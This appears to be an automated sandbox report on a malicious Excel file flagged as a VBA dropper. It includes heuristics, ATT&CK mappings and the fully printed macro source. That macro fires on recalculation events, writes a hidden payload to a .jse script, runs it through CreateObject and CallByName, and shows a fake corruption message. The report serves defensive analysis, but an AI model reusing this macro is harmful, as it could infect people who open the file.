MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-8802594-0. It contains VBA macros that utilize CreateObject and CallByName functions, indicative of malicious intent. The script attempts to construct a path for a second-stage payload, likely a JavaScript file, and write its content to it, suggesting it acts as a downloader.
Heuristics 7
-
ClamAV: Xls.Dropper.Agent-8802594-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-8802594-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
External hyperlinks (4) low OOXML_EXTERNAL_HYPERLINKSDocument contains 4 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.quora.com/profile/Alok-Jha-43
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.micr In document text (OOXML body / shared strings)
- http://schemas.microso�In document text (OOXML body / shared strings)
- http://schemasIn document text (OOXML body / shared strings)
- https://www.quora.com/profile/Alok-Jha-43Document hyperlink
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3680 bytes |
SHA-256: 9b57c7e4bdfc2acdfbf82a4d62a725b561debe9b089aac4e9619f767cf8cdf3a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Function MIObj() As Object
Dim rng As Range
Dim i As Integer
For Each rng In ActiveSheet.UsedRange
If WorksheetFunction.IsError(rng) Then
i = i + 1
rng.Style = "bad"
End If
Next rng
Range("F115").Value = UserForm1.d_d0.Caption
Range("F116").Value = UserForm1.d_d1.Caption
Set MIObj = CreateObject(Replace(Range("F115").Value & Range("F116").Value, "Y", ""))
End Function
Sub highlightSpecificValues()
Dim rng As Range
Dim i As Integer
Dim c As Variant
c = "A1"
For Each rng In ActiveSheet.UsedRange
If rng = c Then
rng.Style = "Note"
i = i + 1
End If
Next rng
MsgBox "There are total " & i & " " & c & " in this worksheet."
End Sub
Sub degreeSymbol(ddf As Variant)
Dim rng As Range
For Each rng In Selection
rng.Select
If ActiveCell <> "" Then
If IsNumeric(ActiveCell.Value) Then
ActiveCell.Value = ActiveCell.Value & "°" & ddf
End If
End If
Next
End Sub
Private Sub Nbed_78()
Range("F143").Value = """"
Range("F123").Value = ActiveWorkbook.Path & "\RPb.hudi" & "" & ".j" & "" & "s" & "e"
degreeSymbol CallByName(MIObj, UserForm1.Film.Caption, 1, Range("F143").Value & Range("F123").Value & Range("F143").Value, 1)
MsgBox "The file is corrupted and cannot be opened"
highlightSpecificValues
End Sub
Private Sub Tinrfc()
Range("F123").Value = ActiveWorkbook.Path & "\RPb" & "" & ".hudi.j" & "" & "s" & "e"
DertOpl = Range("F123").Value
Open DertOpl For Output As #1
Print #1, UserForm1.Inside.Value
Close #1
End Sub
Sub Nedcttg(des As Integer)
Dim TgIok As Workbook
awse = ActiveWorkbook.Application.StartupPath & "\..\..\..\Ex8Sw"
On Error Resume Next
MkDir awse
Konrf_8 = awse & "\Table" & des & ".xlsm"
Application.DisplayAlerts = False
ActiveWorkbook.SaveCopyAs Konrf_8
Range("F133").Value = "!Sheet1.Tinrfc"
Set TgIok = Workbooks.Open(Konrf_8)
If UserForm1.SAZ.Caption = "Edar" Then
UserForm1.SAZ.Caption = "DOlerc"
TgIok.Application.Run "'" & TgIok.FullName & "'" & Range("F133").Value
Else
Range("F131").Value = "!Sheet1.Nbed_78"
TgIok.Application.Run "'" & TgIok.FullName & "'" & Range("F131").Value
End If
Set TgIok = Nothing
End Sub
Private Sub Worksheet_PivotTableUpdate(ByVal Target As PivotTable)
Nedcttg 9
End Sub
Private Sub Worksheet_Calculate()
Nedcttg 55
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{2324325F-79BC-422C-9975-B1892917E250}{03763AE3-6E0F-4717-B249-114C16B7CA71}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 678912 bytes |
SHA-256: fad30b1adce154b10cff417f72cebd927d675d181e52b66e9a2c3b151890a9ab |
|||
|
Detection
ClamAV:
Xls.Dropper.Agent-8802594-0
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.